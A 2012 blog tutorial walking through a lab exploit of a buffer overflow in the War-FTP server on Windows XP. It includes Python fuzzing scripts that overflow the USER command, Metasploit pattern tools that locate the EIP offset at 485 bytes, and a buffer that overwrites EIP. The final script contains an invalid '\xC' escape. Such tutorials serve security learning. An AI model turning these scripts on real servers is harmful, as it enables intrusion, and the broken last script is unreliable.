Wednesday, September 19, 2012

Software Exploitation Part 1

In this tutorial, I will try to explain the basics of software exploitation. On this occasion, I will give an example of a simple application that runs on Windows operating systems, called war-FTP. War-FTP is an FTP server application that runs on Windows and is an application that does not have protection against buffer overflow (non SEH). Ok, now what is a buffer overflow?, and what is a SEH ?



Buffer Overflow

 Buffer overflow occurs when a buffer overflow happens when an application receives a bigger chunk of data than it is expecting, with the result that the data doesn't fit into the allocated storage space, or buffer. The reason that buffer overflow errors are so common is that human programmers make errors: they fail to foresee that unexpected data values may be entered, and they fail to carry out bounds checking to ensure that any data that a user enters falls within the expected range.


SEH

An exception is an event that occurs during the execution of a program, and requires the
execution of code outside the normal flow of control. Structured exception handling is a mechanism for handling both hardware and software exceptions. When a SEH exception occurs, you typically see a window that offers to send an error report to Microsoft

Lets Begin !!

 Host    : Backtrack 5 R2 (IP address : 192.168.1.1)

 Target : Microsoft Windows XP SP3 (IP address 192.168.1.101)

Target apps : War-FTP on win XP (port 21)

Information gathering


















from Nessus :







Description from Nessus (select as shown figure above)

The version of War FTP Daemon running on this host contains a buffer overflow in the code that handles the USER and PASS commands.  A potential intruder could use this vulnerability to crash the server  as well as run arbitrary commands on the system.

After this, we can fuzzing with simple fuzzer. We will try to send data 'A' as much as 1000 to war-FTP application by this fuzzer.

#!/usr/bin/python

 #file : myfuzzer.py

import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="\x41" * 1000
s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")

we can run a fuzzer is as follows :





Wow...war-FTP application immediately closed. in this case, war-FTP crashes caused by fuzzer. 

 Ok, after this, if we can't run a War-FTP. Therefore, we have to delete FtpDaemon.dat in our War-FTP folder.

 Debugger

Now, we want to know what happens in memory system of War-FTP. In this case, we will use debugger in Windows XP, Ollydbg.
Please runs War-FTP under Ollydbg and than we will fuzzing again.














Ok, we will find out in how many bytes to accumulate EIP register. We will use 2 little program, pattern_create.rb & pattern_offset.rb. The location of the file is /opt/metasploit/apps/pro/msf3/tools/
root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_create.rb > string_pattern.txt 

We will use pattern in string_pattern.txt as data when we fuzzing. 


 #!/usr/bin/python

import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8A
b9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0
Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3
Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5
Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8
Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9
An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0
Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1
Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3
At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4
Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4
Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5
Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6
Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8
Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1
Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")

Fuzzing again....!, then you will see the following war-FTP


  
















Now we will calculate the amount of bytes from the pattern set generated by the application pattern_create.rb. We will use patter_offset.rb

root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb 32714131
485
root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb q4Aq5Aq
493
root@bt:/opt/metasploit/apps/pro/msf3/tools#

Note :
32714131 is EIP address

q4Aq5Aq  is data ESP


Ok, we will modify our fuzzer as follows :

 #!/usr/bin/python

import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="\x90" * 485
buff+="\xEF\xBE\xAD\xDE"

s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")


Fuzzing again...


















Ok, we will modify again our fuzzer as follows :
#!/usr/bin/python

import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="\x90" * 485
buff+="\xEF\xBE\xAD\xDE"
buff+="\x90" * (493-len(buff))
buff+="\xC" * (1000 - len(buff))

s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")



























Continued on software exploitation part 2
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)